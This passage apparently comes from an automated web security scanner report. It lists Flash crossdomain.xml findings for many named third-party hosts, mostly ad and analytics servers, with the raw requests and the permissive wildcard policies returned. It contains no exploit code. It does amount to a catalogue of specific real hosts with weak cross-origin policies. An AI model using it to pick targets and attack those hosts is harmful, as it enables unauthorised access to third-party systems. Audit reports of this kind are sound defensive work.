HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT ETag: "15690dc-e6-1230c1c0" Accept-Ranges: bytes Content-Length: 230 Content-Type: text/xml Expires: Tue, 06 Sep 2011 15:37:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:37:47 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Casale Media --> <cross-domain-policy> <allow-access-from domain="* " />...[SNIP]...
4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://rcv-srv03.inplay.tubemogul.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rcv-srv03.inplay.tubemogul.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _tmid=-5675633421699857517
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1313337982000" Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT host: rcv-srv03 Content-Type: application/xml Content-Length: 204 Date: Tue, 06 Sep 2011 16:13:59 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.59. http://receive.inplay.tubemogul.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://receive.inplay.tubemogul.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: receive.inplay.tubemogul.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _tmid=-5675633421699857517
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1313337982000" Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT host: rcv-srv03 Content-Type: application/xml Content-Length: 204 Date: Tue, 06 Sep 2011 16:13:01 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.60. http://reviews.gillettevenus.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://reviews.gillettevenus.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: reviews.gillettevenus.com
Response
HTTP/1.0 200 OK Content-Type: text/xml;charset=utf-8 Content-Language: en-US Date: Tue, 06 Sep 2011 16:45:34 GMT Content-Length: 230 Connection: close <?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="* "/><allow-http-request-headers-from domain="*" heade...[SNIP]...
4.61. http://s0.2mdn.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://s0.2mdn.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 05 Sep 2011 23:18:10 GMT Expires: Fri, 02 Sep 2011 23:16:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 56400 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site-...[SNIP]... <allow-access-from domain="* " secure="false"/>...[SNIP]...
4.62. http://search.twitter.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.twitter.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: search.twitter.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:12:53 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT Accept-Ranges: bytes Content-Length: 206 Cache-Control: max-age=1800 Expires: Tue, 06 Sep 2011 16:42:53 GMT Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-po...[SNIP]...
4.63. http://secure-us.imrworldwide.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://secure-us.imrworldwide.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide.com
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 14:56:57 GMT Content-Type: text/xml Content-Length: 268 Last-Modified: Wed, 14 May 2008 01:55:09 GMT Connection: close Expires: Tue, 13 Sep 2011 14:56:57 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* "/> <site-control permi...[SNIP]...
4.64. http://services.plymedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://services.plymedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: services.plymedia.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: max-age=15552000 Content-Length: 682 Content-Type: text/xml Content-Location: http://services.plymedia.com/crossdomain.xml Last-Modified: Sun, 12 Oct 2008 12:01:36 GMT Accept-Ranges: bytes ETag: "d4bdbe46622cc91:69f" Server: Microsoft-IIS/6.0 Date: Tue, 06 Sep 2011 16:12:57 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.65. http://speed.pointroll.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://speed.pointroll.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: speed.pointroll.com
Response
HTTP/1.0 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT Accept-Ranges: bytes ETag: "8e43ce60b7d5ca1:527" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:57:11 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*"/> </cross-domain-policy>
4.66. http://static.plymedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://static.plymedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: static.plymedia.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK x-amz-id-2: p2kfOzDCng+L76/JTsga//ruR9goW2HSjGFLQ4hzapeI1gDCQ+kmiJpTbuF2/Np4 x-amz-request-id: E50262CF927C8E0A Date: Tue, 12 Jul 2011 23:33:42 GMT Cache-Control: public, max-age=3600, s-maxage=3600 Last-Modified: Wed, 13 May 2009 15:23:00 GMT ETag: "60a8f758689bdda4e7f5930695eaaee5" Accept-Ranges: bytes Content-Type: text/xml Content-Length: 682 Server: AmazonS3 Age: 2242 X-Cache: Hit from cloudfront X-Amz-Cf-Id: 123b0430d85da58b68cb675acbdd06c268df8e8fd9fca78a071b7f61da95f240a1e6cf1947de972d Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 146c5c89c7c8fdf6aead7052bd267a9d.cloudfront.net:11180 (CloudFront) Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://static.plymedia.com.s3.amazonaws.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: static.plymedia.com.s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK x-amz-id-2: Pd0L2ovjrp/ISSNethDM0f3pSYm1BIX6qTq2TTDXHH+SL+bp1gPlnN6PYv/OGA5v x-amz-request-id: C468540F9D630C4D Date: Tue, 06 Sep 2011 16:13:11 GMT Cache-Control: public, max-age=3600, s-maxage=3600 Last-Modified: Wed, 13 May 2009 15:23:00 GMT ETag: "60a8f758689bdda4e7f5930695eaaee5" Accept-Ranges: bytes Content-Type: text/xml Content-Length: 682 Server: AmazonS3 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.68. http://stats.deloitte.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.deloitte.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: stats.deloitte.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:57:01 GMT Server: Omniture DC/2.0.0 xserver: www88 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.69. http://statse.webtrendslive.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://statse.webtrendslive.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: statse.webtrendslive.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:8bf" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:45:45 GMT Connection: close <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.70. http://tags.bluekai.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.bluekai.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 14:56:53 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT ETag: "32883cc-ca-4a6e0af03f580" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close <cross-domain-policy> <allow-access-from domain="* " to-ports="*"/> <site-control permitted-cross-domain-policies="all"/> <allow-http-request-headers-from domain="*" headers="*"/> </cross-domain-policy...[SNIP]...
4.71. http://tf.nexac.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://tf.nexac.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tf.nexac.com
Response
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.72. http://ttwbs.channelintelligence.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ttwbs.channelintelligence.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ttwbs.channelintelligence.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:44:39 GMT Server: Jetty(6.1.22) Cache-Control: max-age=86400 Content-Length: 441 content-type: application/xml Age: 61 Via: 1.1 iad061108 (MII-APC/2.1) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> ...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.73. http://wingateweb.112.2o7.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://wingateweb.112.2o7.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: wingateweb.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:56:54 GMT Server: Omniture DC/2.0.0 xserver: www125 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.74. http://ad.wsod.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.wsod.com
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 17:05:46 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT ETag: "447038-20a-47fbe8ebb5c80" Accept-Ranges: bytes Content-Length: 522 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*" headers="...[SNIP]... <allow-access-from domain="*.wsod.com " secure="false" />...[SNIP]... <allow-access-from domain="*.wallst.com " secure="false" />...[SNIP]... <allow-access-from domain="*.wsodqa.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msads.net " secure="false" />...[SNIP]...
4.75. http://adadvisor.net/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://adadvisor.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:59:04 GMT Connection: close Server: AAWebServer P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID" Content-Length: 478 Content-Type: Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="...[SNIP]... <allow-access-from domain="*.tubemogul.com " />...[SNIP]... <allow-access-from domain="*.adap.tv " />...[SNIP]... <allow-access-from domain="*.videoegg.com " />...[SNIP]... <allow-access-from domain="*.tidaltv.com " />...[SNIP]...
4.76. http://ads.adsonar.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ads.adsonar.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ads.adsonar.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:56:44 GMT Server: Apache Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT ETag: "a3d-466fac2afc940" Accept-Ranges: bytes Content-Length: 2621 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=150, max=896 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="assets.espn.go.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="static.espn.go.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.quigo.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.lonelyplanet.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.mochila.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.conxise.net " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="app.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="media.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="static.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.digitalcity.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.aolcdn.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="cdn-startpage.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="startpage.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.channels.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.channel.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.web.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.my.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.news.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="iamalpha.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="imakealpha.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />...[SNIP]... <allow-access-from domain="*.spinner.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.popeater.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.theboombox.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.opticalcortex.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.yourminis.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.facebook.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.liveminis.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.brightcove.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.lightningcast.com " to-ports="*" secure="false" />...[SNIP]...
4.77. http://ads1.msn.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ads1.msn.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ads1.msn.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=31536000 Date: Tue, 06 Sep 2011 15:00:14 GMT Content-Length: 616 Content-Type: text/xml Last-Modified: Thu, 12 May 2011 21:35:14 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0)) X-Powered-By: ASP.NET Expires: Sat, 30 Jun 2012 12:49:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="global.msads.net " /> <allow-access-from domain="msnbcmedia.msn.com " /> <allow-access-from domain="*.msnbc.msn.com " /> <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msads.net " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn-int.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn-int.com " secure="false" />...[SNIP]...
4.78. http://adx.g.doubleclick.net/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://adx.g.doubleclick.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adx.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1 Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Tue, 06 Sep 2011 17:05:55 GMT Expires: Wed, 07 Sep 2011 17:05:55 GMT Cache-Control: public, max-age=86400 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="maps.gstatic.com " /> <allow-access-from domain="maps.gstatic.cn " /> <allow-access-from domain="*.googlesyndication.com " /> <allow-access-from domain="*.google.com " /> <allow-access-from domain="*.google.ae " /> <allow-access-from domain="*.google.at " /> <allow-access-from domain="*.google.be " /> <allow-access-from domain="*.google.ca " /> <allow-access-from domain="*.google.ch " /> <allow-access-from domain="*.google.cn " /> <allow-access-from domain="*.google.co.il " /> <allow-access-from domain="*.google.co.in " /> <allow-access-from domain="*.google.co.jp " /> <allow-access-from domain="*.google.co.kr " /> <allow-access-from domain="*.google.co.nz " /> <allow-access-from domain="*.google.co.uk " /> <allow-access-from domain="*.google.co.ve " /> <allow-access-from domain="*.google.co.za " /> <allow-access-from domain="*.google.com.ar " /> <allow-access-from domain="*.google.com.au " /> <allow-access-from domain="*.google.com.br " /> <allow-access-from domain="*.google.com.gr " /> <allow-access-from domain="*.google.com.hk " /> <allow-access-from domain="*.google.com.ly " /> <allow-access-from domain="*.google.com.mx " /> <allow-access-from domain="*.google.com.my " /> <allow-access-from domain="*.google.com.pe " /> <allow-access-from domain="*.google.com.ph " /> <allow-access-from domain="*.google.com.pk " /> <allow-access-from domain="*.google.com.ru " /> <allow-access-from domain="*.google.com.sg " /> <allow-access-from domain="*.google.com.tr " /> <allow-access-from domain="*.google.com.tw " /> <allow-access-from domain="*.google.com.ua " /> <allow-access-from domain="*.google.com.vn " /> <allow-access-from domain="*.google.de " /> <allow-access-from domain="*.google.dk " /> <allow-access-from domain="*.google.es " /> <allow-access-from domain="*.google.fi " /> <allow-access-from domain="*.google.fr " /> <allow-access-from domain="*.google.it " /> <allow-access-from domain="*.google.lt " /> <allow-access-from domain="*.google.lv " /> <allow-access-from domain="*.google.nl " /> <allow-access-from domain="*.google.no " /> <allow-access-from domain="*.google.pl " /> <allow-access-from domain="*.google.pt " /> <allow-access-from domain="*.google.ro " /> <allow-access-from domain="*.google.se " /> <allow-access-from domain="*.google.sk " /> <allow-access-from domain="*.youtube.com " /> <allow-access-from domain="*.ytimg.com " /> <allow-access-from domain="*.2mdn.net " /> <allow-access-from domain="*.doubleclick.net " /> <allow-access-from domain="*.doubleclick.com " />...[SNIP]...
4.79. http://assets1.csc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://assets1.csc.com
Path:
/crossdomain.xml
Issue detail
